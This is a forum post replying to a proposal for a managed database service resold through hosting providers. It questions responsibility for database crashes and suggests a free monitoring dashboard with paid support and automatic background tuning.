The hosting provider would be responsible for 1) servers, network, etc; 2) customer acquisition; 3) customer support.
Appears so.

quote:

Since these are things that hosting providers are already very good at, I see this a win-win for everyone. Customers get managed services from providers they like; providers get new revenue with little extra operational overhead and; I get my fair share too! Providers can either get new customers, or upsell their existing ones.
So you deploy a database, optimize on generic metrics, and peace out? What happens when a database croaks? If you install it, you're doubly responsible to ensure it's running even after an abrupt system crash. MySQL is particularly quarrelsome on crashes before MariaDB 10 offlining tables until they are manually checked...

quote:

I see a bunch of managed MongoDB companies popping up, including one acquired by IBM (compose.io), so there's gotta be a market for this, right?
Maybe. I'd see it being very niche. Most providers that have the capability to deploy enormous databases usually have a dedicated DBA team on site to fix whatever pops up.

I could see this being a complementary service to something like ServerPilot, which I hold my own reservations as to the actual efficacy of, to wannabe sysadmins who purchase VPSes that have no earthly clue as to what they are doing. Throw in a simple monitoring dashboard that works with all of the NoSQL/RDBMS' out there, attach a $0 price tag, and charge on support (charge hand over fist might I add!) and you have a product that could be received very warmly for IaaS providers like Linode, DO, and Vultr.

Edit:

For premium version add: easy clustering and replication.

For free version: background optimization like what ktune/tuned does, e.g. mysqltuner.pl

Database loads adjust over time. Having something constantly working in the background, monitoring, making inferences, and then tuning to squeeze maximum performance out would be a killer feature. If you were to make an easy sell, that's the feature that would arouse my interest.

nem fucked around with this message at 05:34 on Aug 19, 2016

  • 1
  • 2
  • 3
  • 4
  • 5
  • Post
  • Reply